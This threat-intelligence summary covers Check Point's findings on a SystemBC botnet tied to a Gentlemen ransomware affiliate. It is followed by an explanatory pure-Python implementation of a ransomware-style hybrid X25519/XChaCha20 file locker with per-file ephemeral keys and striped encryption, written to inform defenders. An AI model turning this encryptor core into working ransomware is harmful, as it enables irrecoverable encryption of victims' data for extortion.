Check Point researchers uncovered a SystemBC botnet of more than 1,570 infected hosts tied to a Gentlemen ransomware affiliate, who used the SystemBC proxy infrastructure for covert payload delivery. The Gentlemen RaaS, active since mid-2025 with Go and C lockers (including an ESXi variant), employs a human-operated toolkit of Cobalt Strike, Mimikatz and GPO-based propagation, and a hybrid X25519/XChaCha20 encryption scheme. #SystemBC #GentlemenRansomware
Key points
- Check Point identified a SystemBC botnet of over 1,570 hosts associated with a Gentlemen ransomware affiliate.
- Gentlemen RaaS provides Go-based lockers for Windows, Linux, NAS and BSD and a C-based encryptor for ESXi systems.
- The operators worked from a compromised Domain Controller with Domain Admin rights, harvesting credentials with Mimikatz before deploying Cobalt Strike.
- Gentlemen encrypts with X25519 and XChaCha20 using an ephemeral key per file, so each file key can only be rebuilt with the operator's private key; small files are encrypted in full, while large files have only selected chunks encrypted, which speeds up the run but leaves unencrypted stretches of large files on disk.
- Victims are mainly in the US, UK, Germany, Australia and Romania, and Check Point released IoCs and a YARA rule to aid defenders.
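The following pure-Python model is an added example (not Check Point's code and not the Gentlemen locker itself) of how a hybrid X25519/XChaCha20 file-encryption scheme with per-file ephemeral keys and selective chunk encryption fits together, as described in the key points above. X25519 and XChaCha20 are implemented inline from their RFC/draft descriptions so the block runs offline; the header layout (ephemeral public key followed by a 24-byte nonce), the SHA-256 key derivation, and the chunk size and spacing in `stripes()` are assumptions chosen for illustration, not details taken from the report.

```python
# Toy hybrid X25519 + XChaCha20 file locker: added illustration, not Gentlemen's
# code. Pure stdlib; header layout, KDF and chunk policy are assumptions.
import hashlib
import os
import struct
P = 2**255 - 19
BASEPOINT = b"\x09" + b"\x00" * 31
M32 = 0xFFFFFFFF
CONST = struct.unpack("<4I", b"expand 32-byte k")
SMALL, CHUNK, STRIDE = 8192, 1024, 4096  # assumed policy, see stripes()

def x25519(k, u):
    """RFC 7748 Montgomery ladder (not constant-time: illustration only)."""
    k = int.from_bytes(k, "little")
    k = (k & ~7 & ((1 << 255) - 1)) | (1 << 254)  # clamp the scalar
    u = int.from_bytes(u, "little") & ((1 << 255) - 1)
    x2, z2, x3, z3, swap = 1, 0, u, 1, 0
    for t in range(254, -1, -1):
        kt = (k >> t) & 1; swap ^= kt
        if swap: x2, x3, z2, z3 = x3, x2, z3, z2
        swap = kt
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        c, d = (x3 + z3) % P, (x3 - z3) % P
        da, cb = d * a % P, c * b % P
        x3, z3 = pow(da + cb, 2, P), u * pow(da - cb, 2, P) % P
        e = (aa - bb) % P
        x2, z2 = aa * bb % P, e * (aa + 121665 * e) % P
    if swap: x2, x3, z2, z3 = x3, x2, z3, z2
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, "little")

def _qr(s, a, b, c, d):
    """ChaCha quarter round, in place on the 16-word state list."""
    for shift, (i, j, k) in ((16, (a, b, d)), (12, (c, d, b)),
                             (8, (a, b, d)), (7, (c, d, b))):
        s[i] = (s[i] + s[j]) & M32
        x = s[k] ^ s[i]
        s[k] = ((x << shift) & M32) | (x >> (32 - shift))

def _rounds(state):
    """Ten ChaCha double rounds; returns a new state list."""
    s = list(state)
    for _ in range(10):
        _qr(s, 0, 4, 8, 12); _qr(s, 1, 5, 9, 13)
        _qr(s, 2, 6, 10, 14); _qr(s, 3, 7, 11, 15)
        _qr(s, 0, 5, 10, 15); _qr(s, 1, 6, 11, 12)
        _qr(s, 2, 7, 8, 13); _qr(s, 3, 4, 9, 14)
    return s

def chacha20_block(key, counter, nonce12):
    """RFC 8439 keystream block: 32-byte key, 32-bit block counter, 12-byte nonce."""
    state = [*CONST, *struct.unpack("<8I", key), counter, *struct.unpack("<3I", nonce12)]
    return struct.pack("<16I", *[(x + y) & M32 for x, y in zip(state, _rounds(state))])

def hchacha20(key, nonce16):
    """XChaCha subkey: rounds over key and 16-byte nonce, no feed-forward."""
    s = _rounds([*CONST, *struct.unpack("<8I", key), *struct.unpack("<4I", nonce16)])
    return struct.pack("<8I", *(s[:4] + s[12:]))

def xchacha20(key, nonce24, data, counter=0):
    """XChaCha20 stream XOR with a 24-byte nonce; the same call decrypts."""
    subkey = hchacha20(key, nonce24[:16])
    nonce12 = b"\x00" * 4 + nonce24[16:]
    out = bytearray()
    for i in range(0, len(data), 64):
        ks = chacha20_block(subkey, counter + i // 64, nonce12)
        out += bytes(x ^ y for x, y in zip(data[i:i + 64], ks))
    return bytes(out)

def stripes(n):
    """Ranges to encrypt: whole file if small, else CHUNK bytes every STRIDE bytes (assumed)."""
    if n <= SMALL:
        return [(0, n)]
    return [(o, min(o + CHUNK, n)) for o in range(0, n, STRIDE)]

def _apply(file_key, nonce, data):
    """XOR each stripe with keystream positioned at its byte offset (no keystream reuse)."""
    buf = bytearray(data)
    for start, end in stripes(len(data)):
        buf[start:end] = xchacha20(file_key, nonce, data[start:end], start // 64)
    return bytes(buf)

def keygen():
    """Operator's long-term X25519 pair; only the public half would ship in the locker."""
    priv = os.urandom(32)
    return priv, x25519(priv, BASEPOINT)

def encrypt_file(master_pub, plaintext):
    """Fresh ephemeral X25519 key per file; file key = SHA-256(shared secret) (assumed KDF)."""
    eph_priv = os.urandom(32); eph_pub = x25519(eph_priv, BASEPOINT)
    file_key = hashlib.sha256(x25519(eph_priv, master_pub)).digest()
    nonce = os.urandom(24)
    return eph_pub + nonce, _apply(file_key, nonce, plaintext)  # header, body

def decrypt_file(master_priv, header, body):
    """Only the master private key can rebuild the per-file key from the header."""
    eph_pub, nonce = header[:32], header[32:56]
    file_key = hashlib.sha256(x25519(master_priv, eph_pub)).digest()
    return _apply(file_key, nonce, body)
```

Two properties matter for defenders. Because the file key comes from an ephemeral exchange against the operator's public key, nothing recoverable from the locker binary or the encrypted host allows decryption; only the matching private key does. And because large files are only striped, the bytes between stripes remain plaintext, which is why partially encrypted large files (databases, VM disks, archives) are sometimes recoverable in part during forensic triage; the per-stripe counter in `_apply()` shows the detail a correct implementation needs to avoid reusing keystream across stripes.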